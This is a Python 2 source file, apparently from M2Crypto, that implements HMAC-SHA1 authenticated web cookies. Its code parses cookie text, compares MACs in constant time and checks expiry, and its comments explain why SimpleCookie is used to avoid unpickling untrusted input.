"""Secure Authenticator Cookies

Copyright (c) 1999-2002 Ng Pheng Siong. All rights reserved."""

# M2Crypto
import Rand, m2

# Python. Cookie is bundled with Python 2.x. 
import Cookie, binascii, re, time


# Layout of the authenticated cookie text (the "dough"): the expiry, the
# payload, and an empty digest slot that the base64 HMAC is appended to.
_MIX_FORMAT = 'exp=%s&data=%s&digest='

# Parser for text produced with _MIX_FORMAT.  Written as a raw string so the
# regex escapes reach the `re` module untouched.
#   group 1: expiry -- digits, a literal dot, digits
#   group 2: data   -- greedy, so it runs up to the last "&digest="
#   group 3: digest -- a run of non-whitespace, possibly empty
# The pattern is only anchored at the start (it is used with .match()).
_MIX_RE = re.compile(r'exp=(\d+\.\d+)&data=(.+)&digest=(\S*)')

def mix(expiry, data, format=_MIX_FORMAT):
    """Build the cookie text that is fed to the MAC.

    `expiry` is rendered with repr() and `data` is interpolated as given;
    neither is escaped here, so the result ends with an empty "digest="
    slot ready for the MAC to be appended.
    """
    fields = (repr(expiry), data)
    return format % fields

def unmix(dough, regex=_MIX_RE):
    """Split cookie text into (expiry, data), or return None if it does not parse.

    This only parses: the digest is not looked at, so the returned values
    are unauthenticated until a caller has verified the MAC.
    """
    match = regex.match(dough)
    if not match:
        return None
    expiry_text = match.group(1)
    payload = match.group(2)
    return float(expiry_text), payload

def unmix3(dough, regex=_MIX_RE):
    """Split cookie text into (expiry, data, digest), or return None.

    The digest is returned exactly as it appears in the text; nothing is
    verified here.  Callers must recompute the MAC over expiry and data and
    compare it with the returned digest before trusting either field.
    """
    match = regex.match(dough)
    if not match:
        return None
    expiry_text, payload, digest = match.group(1), match.group(2), match.group(3)
    return float(expiry_text), payload, digest


# Name of the cookie (the morsel key) that carries the authenticated value.
_TOKEN = "_M2AUTH_"

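class AuthCookieJar:
    """Issue and verify HMAC-SHA1 authenticated cookies.

    The MAC key is drawn from Rand.rand_bytes() when the jar is created and
    is held only on the instance, so a cookie verifies only against the jar
    that issued it.  The cookie payload is authenticated, not encrypted.
    """

    # Key length in bytes.
    _keylen = 20

    def __init__(self):
        self._key = Rand.rand_bytes(self._keylen)

    def _hmac(self, key, data):
        """Return the base64 HMAC-SHA1 of `data` under `key`.

        b2a_base64() appends a newline; the slice drops it.
        """
        return binascii.b2a_base64(m2.hmac(key, data, m2.sha1()))[:-1]

    def _mac_equal(self, expected, supplied):
        """Compare two strings without stopping at the first differing byte.

        A plain `==` can return sooner the earlier the strings differ, which
        lets response timing reveal how much of a guessed MAC is correct.
        Only the length comparison short-circuits here.  Non-string input
        compares unequal instead of raising.
        """
        try:
            if len(expected) != len(supplied):
                return 0
            diff = 0
            for a, b in zip(expected, supplied):
                diff |= ord(a) ^ ord(b)
        except TypeError:
            return 0
        return diff == 0

    def makeCookie(self, expiry, data):
        """Return a new AuthCookie for `expiry` and `data`, MAC'd with this jar's key."""
        dough = mix(expiry, data)
        return AuthCookie(expiry, data, dough, self._hmac(self._key, dough))

    def isGoodCookie(self, cookie):
        """Return a true value if `cookie` is unexpired and its MAC verifies.

        The cookie is rebuilt from its own expiry and data with this jar's
        key, and the rebuilt MAC and output are compared with the supplied
        ones.
        """
        # NOTE: assert statements are stripped under `python -O`; the checks
        # below do not rely on this one for their correctness.
        assert isinstance(cookie, AuthCookie)
        if cookie.isExpired():
            return 0
        c = self.makeCookie(cookie._expiry, cookie._data)
        # Both values embed the MAC, so both are compared in constant time.
        mac_ok = self._mac_equal(c._mac, cookie._mac)
        output_ok = self._mac_equal(c.output(), cookie.output())
        return (c._expiry == cookie._expiry) \
            and (c._data == cookie._data) \
            and mac_ok \
            and output_ok

    def isGoodCookieString(self, cookie_str):
        """Return a true value if `cookie_str` carries a valid, unexpired cookie.

        `cookie_str` is untrusted client input.  It is parsed with
        Cookie.SimpleCookie, which treats values as plain strings.
        Cookie.SmartCookie must not be used here: it attempts to unpickle
        every cookie value while loading, i.e. before the MAC has been
        checked.  Exceptions raised by load() propagate to the caller.
        """
        c = Cookie.SimpleCookie()
        c.load(cookie_str)
        if _TOKEN not in c:
            return 0
        undough = unmix3(c[_TOKEN].value)
        if undough is None:
            return 0
        exp, data, mac = undough
        # Recompute the MAC over the parsed fields; the client-supplied
        # digest is only ever compared, never trusted.
        c2 = self.makeCookie(exp, data)
        mac_ok = self._mac_equal(c2._mac, mac)
        return (not c2.isExpired()) and mac_ok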


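class AuthCookie:
    """A single authenticated cookie: expiry, data and the MAC over both.

    Instances are normally created by AuthCookieJar.makeCookie(); this class
    only stores the values and renders them, it does not verify anything.
    """

    def __init__(self, expiry, data, dough, mac):
        """Store the fields and build the cookie whose value is dough + mac."""
        self._expiry = expiry
        self._data = data
        self._mac = mac
        value = '%s%s' % (dough, mac)
        # SimpleCookie keeps the value as a plain string.  SmartCookie is
        # deprecated as insecure: it pickles non-str values when setting and
        # unpickles values when loading.
        self._cookie = Cookie.SimpleCookie()
        self._cookie[_TOKEN] = value
        self._name = value  # XXX WebKit only.

    def expiry(self):
        """Return the cookie's expiry time."""
        return self._expiry

    def data(self):
        """Return the data portion of the cookie."""
        return self._data

    def mac(self):
        """Return the cookie's MAC."""
        return self._mac

    def output(self):
        """Return the cookie's output in "Set-Cookie" format."""
        return self._cookie.output()

    def value(self):
        """Return the value stored under the auth cookie name, i.e. the
        output minus the "Set-Cookie: " portion.
        """
        return self._cookie[_TOKEN].value

    def isExpired(self):
        """Return a true value if the current time is past the expiry."""
        return (time.time() > self._expiry)

    # XXX Following methods are for WebKit only. These should be pushed
    # to WKAuthCookie.
    def name(self):
        """Return the dough + mac string stored at construction time."""
        return self._name

    def headerValue(self):
        """Return the same string as value()."""
        return self.value()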

